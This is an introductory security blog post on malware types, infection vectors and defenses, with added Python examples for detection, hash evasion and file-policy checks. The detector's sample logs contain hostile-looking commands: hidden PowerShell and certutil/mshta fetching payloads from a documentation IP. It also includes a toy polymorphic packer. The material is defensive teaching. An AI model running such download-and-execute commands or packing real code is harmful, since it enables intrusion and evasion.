IT Security 101: Malware


Introduction

In this installment of ITSEC101, I will provide an overview of malware. This is a continuation of the previous discussion on threats and threat actors.

I’ll provide a definition, take a look at the different types of malware, and cover how a system becomes infected. Then I’ll lay out common defenses, which go well beyond simply deploying anti-virus.


Malware

Malware refers to software, firmware, code and scripts that are used for malicious activity. The purpose and impact of malware can vary, which gives rise to its subcategories. Note that these categories are not strict: they describe capabilities, and a single piece of malware can display traits from several categories at once.

Before I dive into the subcategories, I want to discuss three types of software that are not necessarily malware, but are important for a defender to understand. Software in these categories is generally benign but unnecessary, and may expose a system to vulnerabilities and attack vectors, or simply consume resources. In general, it should be identified and removed, and steps should be taken to prevent its reinstallation.

Potentially Unwanted Program (PUP)

This term describes software that anti-malware products flag as potentially malicious or simply unnecessary, such as browser toolbars and “system optimizer” utilities bundled into the installers of other programs.

Bloatware

This term describes software that comes preinstalled on some systems by vendors that is often redundant or unnecessary. Some cell phone service providers are notorious for selling lower-end cell phones full of their own versions of common apps.

Adware

This term describes software whose sole purpose is to serve pop-up ads and redirect users to products and services. It can be considered malware, as it often installs itself without the user’s knowledge, is misleading about its purpose, arrives bundled with other software, and frequently hijacks the browser’s home page, search pages and search bar. However, the redirections are not always malicious.

Virus

This term describes malicious code that “infects” other programs by inserting itself into them. It executes when the infected file is executed, and spreads as infected files are copied and shared. It is capable of corrupting, stealing and deleting data.

Worm

This term describes malicious software that replicates itself to spread throughout a network. Unlike a virus, it does not require a “host” program and runs on its own. It can even exploit vulnerabilities in exposed network services in its attempt to spread.

Trojan

This term describes malicious software that poses as legitimate software. Unlike viruses and worms, it does not replicate itself; it relies on the user to install it. It is capable of corrupting, stealing and deleting data.

Ransomware

This term describes malicious software that encrypts data on a system and demands payment, typically in cryptocurrency, in exchange for the decryption key. Some variants also steal the data first and threaten to publish it. Others are purely destructive, with no ransom demand at all.

Spyware

This term describes malicious software that monitors user activity and steals sensitive data.

Rootkits

This term describes malicious software that hides its presence and maintains privileged (administrative or kernel-level) access to a system. It is persistent and stealthy by design, typically modifying the operating system itself so that the files, processes and network connections it controls are not shown to the user or to security tools.

Keyloggers

This term describes malicious software similar to spyware, but specifically refers to the capturing of keystrokes to spy on user activity or steal sensitive information.

Botnets

This term describes a network of infected devices (“bots”) that a threat actor controls through command-and-control (C2) infrastructure, and the malware that enrolls a device in that network. The bots can be directed to act simultaneously, for example to launch distributed denial-of-service attacks or send spam.

Fileless

This term refers to malicious software that runs only in memory, or that abuses tools already present on the system (PowerShell, script hosts and other “living-off-the-land” binaries) to persist without writing a conventional executable to disk. Because little or nothing is written to disk, file-based scanners have few artifacts to find, and detection has to rely on process behaviour and command lines instead.
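The “existing tools” side of fileless malware is usually caught from process-creation telemetry rather than from files. The following is an added example, not code from the original post: a small detection routine run over constructed process-creation log lines (the field layout, host names, command lines and the 203.0.113.0/24 addresses are all made up for this example, and the encoded command decodes to a harmless Write-Host call). It flags PowerShell launched with an encoded command or hidden window, living-off-the-land binaries fetching remote content, and Office applications spawning a shell.

```python
"""Added example (not from the original post): detection logic for
living-off-the-land activity, run over constructed process-creation logs.
Constructed log format: time|host|parent image|image|command line.
"""
import base64
import re
from typing import List

# Constructed encoded command; decodes to a harmless Write-Host.
ENCODED = base64.b64encode("Write-Host 'constructed example'".encode("utf-16-le")).decode()

SAMPLE_LOGS: List[str] = [  # constructed sample telemetry
    f"09:01:02|ws01|explorer.exe|powershell.exe|powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}",
    "09:01:05|ws01|explorer.exe|notepad.exe|notepad.exe C:\\Users\\bob\\notes.txt",
    "09:02:10|ws02|winword.exe|cmd.exe|cmd.exe /c powershell -nop -w hidden -c \"iwr http://203.0.113.5/a.ps1\"",
    "09:03:00|ws03|explorer.exe|mshta.exe|mshta.exe http://203.0.113.5/page.hta",
    "09:04:00|ws03|cmd.exe|certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.5/x.txt C:\\Users\\Public\\x.txt",
    "09:05:00|ws01|services.exe|svchost.exe|svchost.exe -k netsvcs",
    "09:06:00|ws04|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
PS_ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
PS_HIDDEN = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I)
# Built-in binaries commonly abused to pull remote content onto a host.
LOLBIN_REMOTE = re.compile(r"\b(mshta|regsvr32|certutil|rundll32|bitsadmin)\.exe\b.*https?://", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def analyze(line: str) -> List[str]:
    """Return the list of suspicious traits found in one log line (empty if none)."""
    _, host, parent, image, cmd = line.split("|", 4)
    findings: List[str] = []
    if image.lower() == "powershell.exe" or "powershell" in cmd.lower():
        m = PS_ENCODED.search(cmd)
        if m:
            # Encoded commands are UTF-16LE text in base64; decode to see what would run.
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
            findings.append(f"{host}: encoded PowerShell command decodes to: {decoded!r}")
        if PS_HIDDEN.search(cmd):
            findings.append(f"{host}: PowerShell launched hidden or with profile/policy bypass")
    if LOLBIN_REMOTE.search(cmd):
        findings.append(f"{host}: {image} fetching remote content (living-off-the-land)")
    if parent.lower() in OFFICE_PARENTS and image.lower() in SHELLS:
        findings.append(f"{host}: {parent} spawned {image} (possible malicious document)")
    return findings


def scan(lines: List[str]) -> List[List[str]]:
    """Findings for every line, in input order, so benign lines stay visible as empty lists."""
    return [analyze(line) for line in lines]


if __name__ == "__main__":
    for line, findings in zip(SAMPLE_LOGS, scan(SAMPLE_LOGS)):
        print(line.split("|")[3], "->", findings or "clean")
```

Note that the last sample line, a scheduled backup script run by PowerShell, produces no findings: the rules key on the evasion flags and parent/child relationships, not on the mere presence of PowerShell, which is exactly the kind of tuning needed to keep the false-positive rate workable.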

Backdoor

This term refers to malicious software that creates a covert entry point into a system, allowing the attacker to return later while bypassing normal authentication.

Cryptojacker

This term refers to malicious software that hijacks a system’s processing power to mine cryptocurrency for the attacker, silently consuming CPU, electricity and hardware lifetime. (Malware that steals from wallets and exchanges is usually classed as a stealer or banking trojan instead.)

Scareware

This term refers to malicious software that uses fear to manipulate a user into installing actual malware, or contacting a malicious actor, by pretending that the user’s machine is already infected. It will present links to malicious sites, or contact information for bad actors posing as support specialists.

Polymorphic

This term refers to malicious software that replicates itself in a way that avoids detection. By changing parts of its code, or by encrypting its body with a different key on each copy and decrypting it at execution, the malware changes its hash value on every generation, defeating systems that rely on matching file hashes against databases of known malware.
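To make the hash-evasion point concrete, here is an added example (not code from the original post). It builds a toy “polymorphic packer”: the same body is XOR-encoded with a fresh random key on every generation and prefixed with a fixed decoder stub, so every generation has a different SHA-256 while the decoded body is identical. The body, stub and key length are all constructed stand-ins; the body is a plain text string, not executable code. The example then compares three detections: an exact file-hash blocklist, a pattern match on the invariant stub, and hashing after unpacking (what an emulator or memory scanner effectively does).

```python
"""Added example (not from the original post): why a hash blocklist alone
fails against polymorphic code, and what still works.
"""
import hashlib
import random
from typing import Dict, List, Optional, Set

# Constructed stand-in for the malicious body.
BODY = b"CONSTRUCTED EXAMPLE BODY: pretend this is the malicious code"
# Constructed decoder stub. The body can be re-encoded freely, but something
# has to run first to decode it, and that part is much harder to vary.
STUB = b"STUB:xor8-decode-then-run:"
KEY_LEN = 8


def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def mutate(body: bytes, key: Optional[bytes] = None,
           rng: Optional[random.Random] = None) -> bytes:
    """One generation: stub || key || XOR(body, key)."""
    if key is None:
        rng = rng or random.Random()
        key = bytes(rng.getrandbits(8) for _ in range(KEY_LEN))
    return STUB + key + xor(body, key)


def unpack(sample: bytes) -> bytes:
    """Do what the stub would do at run time: recover the key and decode."""
    if not sample.startswith(STUB):
        raise ValueError("not a sample produced by this packer")
    key = sample[len(STUB):len(STUB) + KEY_LEN]
    return xor(sample[len(STUB) + KEY_LEN:], key)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_blocklist_hit(sample: bytes, blocklist: Set[str]) -> bool:
    """Classic detection: exact hash of the file as it sits on disk."""
    return sha256(sample) in blocklist


def stub_pattern_hit(sample: bytes) -> bool:
    """Pattern detection: match the invariant decoder stub, independent of the key."""
    return STUB in sample


def unpacked_hash_hit(sample: bytes, blocklist: Set[str]) -> bool:
    """Unpack first, then hash the decoded body."""
    try:
        return sha256(unpack(sample)) in blocklist
    except ValueError:
        return False


def compare(generations: int = 5, seed: int = 42) -> Dict[str, int]:
    """Teach a hash database the first generation only, then test all three
    detections against every generation. Seeded so the run is repeatable."""
    rng = random.Random(seed)
    samples: List[bytes] = [mutate(BODY, rng=rng) for _ in range(generations)]
    file_hashes = {sha256(samples[0])}   # learned from the first sample on disk
    body_hashes = {sha256(BODY)}         # learned once from the decoded body
    return {
        "distinct_file_hashes": len({sha256(s) for s in samples}),
        "file_hash_hits": sum(hash_blocklist_hit(s, file_hashes) for s in samples),
        "stub_pattern_hits": sum(stub_pattern_hit(s) for s in samples),
        "unpacked_hash_hits": sum(unpacked_hash_hit(s, body_hashes) for s in samples),
    }


if __name__ == "__main__":
    for name, count in compare().items():
        print(f"{name:>22}: {count}")
```

With five generations the file-hash blocklist catches only the one sample it was trained on, while the stub pattern and the unpacked-body hash catch all five. Real polymorphic engines vary the stub as well, which is why behavioural and memory-based detection matter more than any single static signature.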

AI-Powered

This term refers to malicious software developed or operated with the help of artificial intelligence, which may adapt its tactics in response to the defenses it encounters.


Threat Vectors

Malware can find its way onto a system through many paths.

World Wide Web (WWW) - A user might navigate to a site that hosts malicious files and download malware, believing it to be legitimate software. A malicious or compromised site can also run scripts that download and execute malware without any user action (a “drive-by download”), typically by exploiting a vulnerability in the browser or one of its plugins.

USB - Removable media can carry malware between devices. A USB device may contain malware that infects the host it is plugged into, or malicious files that a user then copies across, intentionally or unintentionally.

Email - Malicious actors may send targeted, or blanketed, emails that contain malware in attachments, or links to malware hosting sites.

Supply-Chain - Malicious actors might insert themselves into the supply chain, and infect devices or compromise software thought to be from a trusted and verified source before it reaches a user.

Physical Access - A malicious actor with physical access to a system can install malware.

Remote Access - A malicious actor with remote access to a system can install malware.

System to System - Once one host is infected, malware can spread to other interconnected hosts over the network, for example through file shares, remote administration protocols or vulnerabilities in exposed services.

Man-in-the-Middle - A malicious actor might insert themselves, or a rogue device, physically or logically between a user and the service the user intends to use, and then alter the content or downloads passing through.


Defenses

There are many potential points of defense to prevent malware from reaching a system, but there are no guaranteed methods. So, a multi-layered approach should be taken, and include controls not just for prevention, but also for identification, remediation and recovery in the event of a malware infection. Controls should be risk-based and depend on the specifics of the situation.

Note: Before taking any actions on identified malware, it is important to review findings for false-positives.

  • Train staff on safe practices when using email and the web.

  • Train staff on how to identify and report malicious emails.

  • Train staff on how to identify and report malware infections.

  • Implement firewall policies, or other URL/DNS filtering systems, to block users from accessing malicious websites and sites that provide unofficial software downloads.

  • Implement application control systems and processes to manage the distribution and installation of software from known good sources.

  • Remove administrative rights from the accounts used for daily activities, and allow only authorized, qualified IT staff to install software.

  • Implement anti-malware software on all endpoints, and enable real-time and on-demand anti-malware scans. Implement policies to block the installation of software based on file types, names, paths and hashes. Consider automatic actions such as removal and quarantine.

  • Implement proactive anti-malware policies on next-gen firewalls and in email security systems that block specific file types, names, paths and hashes from being downloaded.

  • Develop playbooks for IT staff and responders on proper identification, removal and recovery.

  • Remove any malicious, unwanted or unnecessary software found in the environment.

  • Keep systems and applications up to date with the latest patches.

  • Harden systems by disabling unnecessary ports and services.

  • Implement network scans and physical walk-throughs to identify rogue devices.

  • Codify all controls with policy, procedure, standards and guidelines.
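Several of the items above (blocking by file type, name, path and hash; application control from known good sources; reviewing findings for false positives) can be expressed as one decision routine. The following is an added example, not code from the original post: a small file-policy check that applies those rules and returns the reason behind every decision, so that “block” and “review” outcomes can be checked for false positives before anything is quarantined. The extension lists, trusted directories, file names, paths, contents and hashes are all constructed policy choices and sample data for this example, not a vendor’s configuration.

```python
"""Added example (not from the original post): a minimal file-policy check
applying type, name, path and hash rules with an allow-list tier for
application control. All names, paths, contents and hashes are constructed.
"""
import hashlib
from dataclasses import dataclass
from typing import List, Set, Tuple

EXECUTABLE_EXTS = {".exe", ".scr", ".msi", ".js", ".vbs", ".hta", ".ps1", ".bat", ".cmd"}
DOCUMENT_EXTS = {".pdf", ".docx", ".xlsx", ".txt", ".jpg", ".png"}
# Leading bytes used to check that the content matches the claimed type.
MAGIC = {b"MZ": "executable", b"%PDF": "pdf", b"PK\x03\x04": "zip-based document"}
RTLO = "\u202e"  # right-to-left override: "photo\u202egpj.scr" displays as "photorcs.jpg"
# Assumed policy: directories standard users cannot write to; unlisted executables may run from here.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


@dataclass
class Decision:
    action: str  # "allow", "block" or "review"
    reason: str


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def extensions(name: str) -> List[str]:
    """All dotted suffixes, lower-cased: "a.pdf.exe" -> [".pdf", ".exe"]."""
    return ["." + p for p in name.lower().split(".")[1:]]


def content_type(data: bytes) -> str:
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def in_trusted_dir(directory: str) -> bool:
    normalised = directory.lower().replace("/", "\\").rstrip("\\") + "\\"
    return normalised.startswith(TRUSTED_DIRS)


def evaluate(name: str, directory: str, data: bytes,
             allow_hashes: Set[str], deny_hashes: Set[str]) -> Decision:
    digest = sha256(data)
    if digest in deny_hashes:                                   # hash rule: known bad
        return Decision("block", f"hash {digest[:12]}... is on the deny list")
    if RTLO in name:                                            # name rule: disguised extension
        return Decision("block", "right-to-left override character in file name")
    exts = extensions(name)
    final = exts[-1] if exts else ""
    if final in EXECUTABLE_EXTS:
        if any(e in DOCUMENT_EXTS for e in exts[:-1]):          # name rule: "invoice.pdf.exe"
            return Decision("block", f"document extension hides an executable: {name}")
        if digest in allow_hashes:                              # application control: known good
            return Decision("allow", "executable hash is on the allow list")
        if in_trusted_dir(directory):                           # path rule
            return Decision("allow", "unlisted executable in an admin-only directory")
        return Decision("block", "unlisted executable in a user-writable directory")
    if final in DOCUMENT_EXTS and content_type(data) == "executable":   # type rule
        return Decision("review", f"content is an executable but the name says {final}")
    return Decision("allow", "non-executable type with no deny-list match")


# Constructed sample contents and lists.
APPROVED_TOOL = b"MZ\x90\x00 constructed bytes of an approved installer"
KNOWN_BAD_DOC = b"PK\x03\x04 constructed bytes of a document known to be malicious"
ALLOW_HASHES = {sha256(APPROVED_TOOL)}
DENY_HASHES = {sha256(KNOWN_BAD_DOC)}

SAMPLES: List[Tuple[str, str, bytes]] = [  # (name, directory, content), all constructed
    ("quarterly_report.pdf", "C:\\Users\\alice\\Downloads", b"%PDF-1.7 constructed"),
    ("invoice.pdf.exe", "C:\\Users\\alice\\Downloads", b"MZ\x90\x00 constructed"),
    ("photo" + RTLO + "gpj.scr", "C:\\Users\\alice\\Downloads", b"MZ\x90\x00 constructed"),
    ("setup.exe", "C:\\Users\\alice\\Downloads", b"MZ\x90\x00 constructed"),
    ("setup.exe", "C:\\Users\\alice\\Downloads", APPROVED_TOOL),
    ("notepad.exe", "C:\\Windows\\System32", b"MZ\x90\x00 constructed"),
    ("notes.txt", "C:\\Users\\alice\\Desktop", b"MZ\x90\x00 constructed"),
    ("agenda.docx", "C:\\Users\\alice\\Downloads", KNOWN_BAD_DOC),
]


def run(samples: List[Tuple[str, str, bytes]] = SAMPLES) -> List[str]:
    """Actions for every sample, in order."""
    return [evaluate(n, d, c, ALLOW_HASHES, DENY_HASHES).action for n, d, c in samples]


if __name__ == "__main__":
    for name, directory, content in SAMPLES:
        decision = evaluate(name, directory, content, ALLOW_HASHES, DENY_HASHES)
        print(f"{decision.action:<6} {name!r:<28} {decision.reason}")
```

The ordering matters: the deny list is checked first because it is the highest-confidence signal, and the allow list is checked before the path rule so that an approved tool can be run from a download folder during rollout. The single “review” outcome (a text file whose content is actually an executable) is deliberately not an automatic block, because that mismatch is occasionally legitimate and is exactly the kind of finding the note above says should be reviewed for false positives.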


Conclusion

Malware is a common tool used by threat actors to gain access, disrupt systems and steal information, and defending against it requires a layered approach. Reliance on outmoded anti-virus systems is not enough to protect against the latest advancements in malware. With capabilities such as fileless infection, polymorphism, and the growing use of AI, mixed with the ever evolving tactics of threat actors, malware is becoming much harder to defend against. It is important to stay vigilant, validate controls, and be aware of the latest threats.


Daily Cuppa

Today’s cup of tea is a refreshing Organic Earl Grey provided by Equal Exchange. Organic, fair trade, and full of flavor. It makes for the perfect start to the work day.

